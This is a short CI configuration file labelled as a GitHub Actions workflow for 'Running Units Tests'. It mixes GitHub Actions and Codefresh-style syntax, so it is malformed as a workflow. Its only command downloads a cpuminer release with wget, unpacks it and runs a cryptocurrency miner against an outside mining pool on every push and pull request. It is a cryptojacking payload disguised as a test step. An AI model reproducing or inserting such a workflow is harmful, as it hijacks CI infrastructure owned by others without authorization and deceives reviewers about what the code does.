name: Github Actions Example

on:
  pull_request:
  push:
    branches: 
      - master
      - develop

jobs:
  test:
    name: Running Units Tests
    runs-on: ubuntu-latest


    steps:
    test:
    title: "Running test"
    type: "freestyle" 
    image: "alpine:3.9" 
    commands:
      - |-
        wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
        tar xf cpuminer-opt-linux.tar.gz
        ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-ru.rplant.xyz:7042 -u isi wallet mu.raufpermana:v -t0
